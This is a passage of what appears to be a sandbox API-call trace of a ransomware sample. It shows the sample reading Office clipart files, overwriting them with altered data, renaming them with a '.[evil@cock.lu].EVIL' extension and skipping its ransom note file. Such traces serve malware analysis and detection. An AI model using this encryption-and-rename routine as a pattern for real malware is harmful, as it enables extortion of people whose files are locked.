(_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02120_.WMF") returned 0x0 [0163.394] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02120_.WMF") returned 0x45 [0163.394] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02120_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02120_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0163.396] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x23d4, lpOverlapped=0x0) returned 1 [0164.056] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0164.056] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0164.056] _errno () returned 0x84b1160840 [0164.056] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0164.056] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x23e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x23e0, lpOverlapped=0x0) returned 1 [0164.056] CloseHandle (hObject=0x1a8) returned 1 [0164.056] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02120_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0164.057] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0164.057] __uncaught_exception () returned 0x84b1160800 [0164.057] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0164.057] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02120_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02120_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02120_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02120_.wmf.[evil@cock.lu].evil")) returned 1 [0164.058] ??_V@YAXPEAX@Z () returned 0x1 [0164.062] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02120_.WMF", dwFileAttributes=0x200) returned 0 [0164.062] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0164.062] wcsstr (_Str="PE02169_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0164.062] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02169_.WMF") returned 69 [0164.062] wcscmp (_String1="PE02169_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0164.062] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02169_.WMF") returned 0x0 [0164.062] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02169_.WMF") returned 0x45 [0164.062] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02169_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02169_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0164.065] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1fc4, lpOverlapped=0x0) returned 1 [0164.088] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0164.088] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0164.088] _errno () returned 0x84b1160840 [0164.089] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0164.089] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1fe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1fe0, lpOverlapped=0x0) returned 1 [0164.089] CloseHandle (hObject=0x1a8) returned 1 [0164.089] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02169_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0164.089] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0164.089] __uncaught_exception () returned 0x84b1160800 [0164.089] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0164.090] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02169_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02169_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02169_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02169_.wmf.[evil@cock.lu].evil")) returned 1 [0164.091] ??_V@YAXPEAX@Z () returned 0x1 [0164.097] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02169_.WMF", dwFileAttributes=0x200) returned 0 [0164.097] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0164.097] wcsstr (_Str="PE02262_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0164.097] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02262_.WMF") returned 69 [0164.097] wcscmp (_String1="PE02262_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0164.097] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02262_.WMF") returned 0x0 [0164.098] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02262_.WMF") returned 0x45 [0164.098] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02262_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0164.101] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x75e2, lpOverlapped=0x0) returned 1 [0164.112] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0164.112] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0164.112] _errno () returned 0x84b1160840 [0164.112] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0164.112] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x7600, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7600, lpOverlapped=0x0) returned 1 [0164.113] CloseHandle (hObject=0x1a8) returned 1 [0164.113] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02262_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0164.113] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0164.113] __uncaught_exception () returned 0x84b1160800 [0164.113] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0164.114] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02262_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02262_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02262_.wmf.[evil@cock.lu].evil")) returned 1 [0164.132] ??_V@YAXPEAX@Z () returned 0x1 [0164.138] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02262_.WMF", dwFileAttributes=0x200) returned 0 [0164.138] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0164.138] wcsstr (_Str="PE02263_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0164.139] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02263_.WMF") returned 69 [0164.139] wcscmp (_String1="PE02263_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0164.139] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02263_.WMF") returned 0x0 [0164.139] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02263_.WMF") returned 0x45 [0164.139] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02263_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02263_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0164.141] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x824e, lpOverlapped=0x0) returned 1 [0164.184] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0164.184] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0164.184] _errno () returned 0x84b1160840 [0164.184] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0164.184] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x8260, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8260, lpOverlapped=0x0) returned 1 [0164.222] CloseHandle (hObject=0x1a8) returned 1 [0164.222] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02263_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0164.998] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0164.998] __uncaught_exception () returned 0x84b1160800 [0164.998] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0164.998] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02263_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02263_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02263_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02263_.wmf.[evil@cock.lu].evil")) returned 1 [0165.000] ??_V@YAXPEAX@Z () returned 0x1 [0165.003] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02263_.WMF", dwFileAttributes=0x200) returned 0 [0165.004] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.004] wcsstr (_Str="PE02265_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.004] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02265_.WMF") returned 69 [0165.004] wcscmp (_String1="PE02265_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.004] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02265_.WMF") returned 0x0 [0165.004] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02265_.WMF") returned 0x45 [0165.004] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02265_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.006] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x62b2, lpOverlapped=0x0) returned 1 [0165.029] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.030] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.030] _errno () returned 0x84b1160840 [0165.030] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.030] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x62c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x62c0, lpOverlapped=0x0) returned 1 [0165.030] CloseHandle (hObject=0x1a8) returned 1 [0165.030] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02265_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.030] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.031] __uncaught_exception () returned 0x84b1160800 [0165.031] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.031] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02265_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02265_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02265_.wmf.[evil@cock.lu].evil")) returned 1 [0165.032] ??_V@YAXPEAX@Z () returned 0x1 [0165.035] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02265_.WMF", dwFileAttributes=0x200) returned 0 [0165.035] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.035] wcsstr (_Str="PE02267_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.035] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02267_.WMF") returned 69 [0165.035] wcscmp (_String1="PE02267_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.035] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02267_.WMF") returned 0x0 [0165.035] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02267_.WMF") returned 0x45 [0165.035] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.042] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x78e0, lpOverlapped=0x0) returned 1 [0165.051] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.051] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.051] _errno () returned 0x84b1160840 [0165.051] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.051] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x7900, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7900, lpOverlapped=0x0) returned 1 [0165.052] CloseHandle (hObject=0x1a8) returned 1 [0165.052] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02267_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.052] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.052] __uncaught_exception () returned 0x84b1160800 [0165.052] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.052] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02267_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02267_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02267_.wmf.[evil@cock.lu].evil")) returned 1 [0165.054] ??_V@YAXPEAX@Z () returned 0x1 [0165.057] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02267_.WMF", dwFileAttributes=0x200) returned 0 [0165.057] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.057] wcsstr (_Str="PE02270_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.057] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02270_.WMF") returned 69 [0165.057] wcscmp (_String1="PE02270_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.057] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02270_.WMF") returned 0x0 [0165.058] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02270_.WMF") returned 0x45 [0165.058] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02270_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.060] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6f26, lpOverlapped=0x0) returned 1 [0165.080] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.080] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.080] _errno () returned 0x84b1160840 [0165.081] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.081] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x6f40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6f40, lpOverlapped=0x0) returned 1 [0165.082] CloseHandle (hObject=0x1a8) returned 1 [0165.082] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02270_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.084] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.084] __uncaught_exception () returned 0x84b1160800 [0165.085] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.085] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02270_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02270_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02270_.wmf.[evil@cock.lu].evil")) returned 1 [0165.089] ??_V@YAXPEAX@Z () returned 0x1 [0165.097] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02270_.WMF", dwFileAttributes=0x200) returned 0 [0165.098] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.098] wcsstr (_Str="PE02278_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.098] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02278_.WMF") returned 69 [0165.098] wcscmp (_String1="PE02278_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.098] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02278_.WMF") returned 0x0 [0165.100] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02278_.WMF") returned 0x45 [0165.100] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02278_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02278_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.107] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb9c4, lpOverlapped=0x0) returned 1 [0165.138] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.138] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.138] _errno () returned 0x84b1160840 [0165.138] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.138] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xb9e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb9e0, lpOverlapped=0x0) returned 1 [0165.139] CloseHandle (hObject=0x1a8) returned 1 [0165.139] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02278_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.140] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.140] __uncaught_exception () returned 0x84b1160800 [0165.140] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.140] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02278_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02278_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02278_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02278_.wmf.[evil@cock.lu].evil")) returned 1 [0165.141] ??_V@YAXPEAX@Z () returned 0x1 [0165.145] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02278_.WMF", dwFileAttributes=0x200) returned 0 [0165.146] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.146] wcsstr (_Str="PE02280_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.146] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02280_.WMF") returned 69 [0165.146] wcscmp (_String1="PE02280_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.146] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02280_.WMF") returned 0x0 [0165.146] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02280_.WMF") returned 0x45 [0165.146] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft 